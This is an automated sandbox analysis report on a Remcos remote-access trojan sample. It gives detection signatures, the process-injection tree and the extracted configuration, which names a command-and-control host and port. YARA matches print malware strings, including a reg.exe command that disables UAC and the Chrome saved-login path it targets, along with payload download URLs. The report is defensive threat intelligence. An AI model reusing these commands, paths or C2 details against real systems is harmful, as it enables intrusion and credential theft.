Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report yVhvGnsUpL

Overview

General Information

Sample Name:yVhvGnsUpL (renamed file extension from none to exe)
Analysis ID:487629
MD5:cf98d2d4d4555323842c8371db09347e
SHA1:2bd28f09d3ea7c08bae3a90dd32c28335488eb43
SHA256:8fa72e87addead9671e573d7cb843ca784a10cfbf6acf5b6bc4830df66fe0bf0
Tags:32exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionalty to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • yVhvGnsUpL.exe (PID: 1400 cmdline: 'C:\Users\user\Desktop\yVhvGnsUpL.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • DpiScaling.exe (PID: 6728 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 302B1BBDBF4D96BEE99C6B45680CEB5E)
    • cmd.exe (PID: 6976 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7032 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 7048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 7116 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Srakjle.exe (PID: 7144 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • mobsync.exe (PID: 4868 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Srakjle.exe (PID: 6164 cmdline: 'C:\Users\Public\Libraries\Srakjle\Srakjle.exe' MD5: CF98D2D4D4555323842C8371DB09347E)
    • mobsync.exe (PID: 6120 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\eljkarS.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x60f17:$str_a1: C:\Windows\System32\cmd.exe
    • 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x600ef:$str_b2: Executing file:
    • 0x6105b:$str_b3: GetDirectListeningPort
    • 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x60adb:$str_b7: \update.vbs
    • 0x6013f:$str_b9: Downloaded file:
    • 0x6012b:$str_b10: Downloading file:
    • 0x60113:$str_b12: Failed to upload file:
    • 0x61023:$str_b13: StartForward
    • 0x61043:$str_b14: StopForward
    • 0x60a83:$str_b15: fso.DeleteFile "
    • 0x60a17:$str_b16: On Error Resume Next
    • 0x60ab3:$str_b17: fso.DeleteFolder "
    • 0x60103:$str_b18: Uploaded file:
    • 0x6017f:$str_b19: Unable to delete:
    • 0x60a4b:$str_b20: while fso.FileExists("
    • 0x605d4:$str_c0: [Firefox StoredLogins not found]
    0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x60f17:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60e93:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60e93:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x6049b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60af3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x600ef:$str_b2: Executing file:
      • 0x6105b:$str_b3: GetDirectListeningPort
      • 0x608b3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x60adb:$str_b7: \update.vbs
      • 0x6013f:$str_b9: Downloaded file:
      • 0x6012b:$str_b10: Downloading file:
      • 0x60113:$str_b12: Failed to upload file:
      • 0x61023:$str_b13: StartForward
      • 0x61043:$str_b14: StopForward
      • 0x60a83:$str_b15: fso.DeleteFile "
      • 0x60a17:$str_b16: On Error Resume Next
      • 0x60ab3:$str_b17: fso.DeleteFolder "
      • 0x60103:$str_b18: Uploaded file:
      • 0x6017f:$str_b19: Unable to delete:
      • 0x60a4b:$str_b20: while fso.FileExists("
      • 0x605d4:$str_c0: [Firefox StoredLogins not found]
      0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        32.2.mobsync.exe.10591a73.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          32.2.mobsync.exe.10591a73.2.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5e2a4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x5e220:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5e220:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5d828:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x5de80:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5d47c:$str_b2: Executing file:
          • 0x5e3e8:$str_b3: GetDirectListeningPort
          • 0x5dc40:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x5de68:$str_b7: \update.vbs
          • 0x5d4cc:$str_b9: Downloaded file:
          • 0x5d4b8:$str_b10: Downloading file:
          • 0x5d4a0:$str_b12: Failed to upload file:
          • 0x5e3b0:$str_b13: StartForward
          • 0x5e3d0:$str_b14: StopForward
          • 0x5de10:$str_b15: fso.DeleteFile "
          • 0x5dda4:$str_b16: On Error Resume Next
          • 0x5de40:$str_b17: fso.DeleteFolder "
          • 0x5d490:$str_b18: Uploaded file:
          • 0x5d50c:$str_b19: Unable to delete:
          • 0x5ddd8:$str_b20: while fso.FileExists("
          • 0x5d961:$str_c0: [Firefox StoredLogins not found]
          12.2.DpiScaling.exe.10590000.2.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            12.2.DpiScaling.exe.10590000.2.unpackREMCOS_RAT_variantsunknownunknown
            • 0x60317:$str_a1: C:\Windows\System32\cmd.exe
            • 0x60293:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60293:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x5f89b:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x5fef3:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x5f4ef:$str_b2: Executing file:
            • 0x6045b:$str_b3: GetDirectListeningPort
            • 0x5fcb3:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x5fedb:$str_b7: \update.vbs
            • 0x5f53f:$str_b9: Downloaded file:
            • 0x5f52b:$str_b10: Downloading file:
            • 0x5f513:$str_b12: Failed to upload file:
            • 0x60423:$str_b13: StartForward
            • 0x60443:$str_b14: StopForward
            • 0x5fe83:$str_b15: fso.DeleteFile "
            • 0x5fe17:$str_b16: On Error Resume Next
            • 0x5feb3:$str_b17: fso.DeleteFolder "
            • 0x5f503:$str_b18: Uploaded file:
            • 0x5f57f:$str_b19: Unable to delete:
            • 0x5fe4b:$str_b20: while fso.FileExists("
            • 0x5f9d4:$str_c0: [Firefox StoredLogins not found]
            32.2.mobsync.exe.10590000.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 31 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpackMalware Configuration Extractor: Remcos {"Version": "3.2.1 Pro", "Host:Port:Password": "twistednerd.dvrlists.com:8618:1", "Assigned name": "Sept", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Sept-AITAB5", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
              Multi AV Scanner detection for submitted fileShow sources
              Source: yVhvGnsUpL.exeVirustotal: Detection: 17%Perma Link
              Source: yVhvGnsUpL.exeReversingLabs: Detection: 13%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exeReversingLabs: Detection: 13%
              Source: 32.0.mobsync.exe.10590000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 12.0.DpiScaling.exe.10590000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 12.0.DpiScaling.exe.10590000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 28.0.mobsync.exe.10590000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 28.0.mobsync.exe.10590000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 28.0.mobsync.exe.10590000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 12.0.DpiScaling.exe.10590000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 32.0.mobsync.exe.10590000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 28.0.mobsync.exe.10590000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 12.2.DpiScaling.exe.10590000.2.unpackAvira: Label: TR/Dropper.Gen
              Source: 32.2.mobsync.exe.10590000.1.unpackAvira: Label: TR/Dropper.Gen
              Source: 32.0.mobsync.exe.10590000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 28.2.mobsync.exe.10590000.1.unpackAvira: Label: TR/Dropper.Gen
              Source: 32.0.mobsync.exe.10590000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: 12.0.DpiScaling.exe.10590000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0042E5CA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006FE5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_006FE5CA
              Source: DpiScaling.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: yVhvGnsUpL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040A012
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004061C3 FindFirstFileW,FindNextFileW,12_2_004061C3
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040A22D
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_004153F5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006DA012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_006DA012
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D61C3 FindFirstFileW,FindNextFileW,28_2_006D61C3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006DA22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_006DA22D
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E53F5 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_006E53F5
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E7754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,28_2_006E7754
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D77EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D77EC
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_00716AF9 FindFirstFileExA,28_2_00716AF9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D7C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_006D7C55
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,28_2_006D697D

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: twistednerd.dvrlists.com
              Source: global trafficTCP traffic: 192.168.2.7:49745 -> 31.3.152.100:8618
              Source: Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21155&authkey=AG_5U-e
              Source: Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmp, Srakjle.exe, 00000017.00000003.327780846.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mJP3DWIE85gNIpmObLH3hi3UpJBBLdFJk7RCXT24FMEV8lArD0Fn2UIcXDbPv6JQH
              Source: yVhvGnsUpL.exe, 00000001.00000003.258050716.00000000006BA000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mNt-qRdwgdgleDGIKLTjkSpjyK1SPD4JqhzBPVsXePk0c3S_cv0HIXRKPw3hfw-mi
              Source: Srakjle.exe, 00000017.00000003.327666701.0000000000908000.00000004.00000001.sdmp, Srakjle.exe, 00000018.00000003.357618476.00000000008DB000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mPMXRQ9RhgDP1jnSDjqdPjwRNYCC8VbCCQIIz4UaVns5irDBNa_yn-ZyicxZlvW-L
              Source: Srakjle.exe, 00000017.00000003.331649206.0000000000919000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mh8HSTx1Gc1J_Se9cvXUaWcrzZtNRVGZZTLbaxsKszTpDWJ-FC3XLmVZQpssvfNP6
              Source: Srakjle.exe, 00000018.00000003.347807282.00000000008E2000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4mohjgwISBEqynaGbNFXQ3e1iQ9fbj0U-Xdj6_ZQCNnX6wH2IF_C6xvDKVjks_iaCm
              Source: Srakjle.exe, 00000018.00000003.344865227.00000000008D1000.00000004.00000001.sdmpString found in binary or memory: https://qcisaa.sn.files.1drv.com/y4myaa9OvyECoBdBcRm0EdYi3SYgM-H9eDickjezG2FcBm2P6AhF8ifoGyKxGwKMCHJ
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 12_2_00422251 recv,12_2_00422251
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D9BD9 OpenClipboard,GetClipboardData,CloseClipboard,28_2_006D9BD9
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D89BA GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,28_2_006D89BA
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006D9BD9 OpenClipboard,GetClipboardData,CloseClipboard,28_2_006D9BD9

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.mobsync.exe.720000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000020.00000002.436621840.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.527624941.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.523698969.0000000003367000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435807202.00000000008C8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.435598601.0000000000720000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.409833618.0000000000818000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 6728, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4868, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 6120, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands:

              barindex
              Contains functionalty to change the wallpaperShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 28_2_006E7F10 SystemParametersInfoW,28_2_006E7F10

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 32.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10591a73.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.6d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10591a73.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.10591a73.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.10591a73.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 28.2.mobsync.exe.6d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 32.2.mobsync.exe.10590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
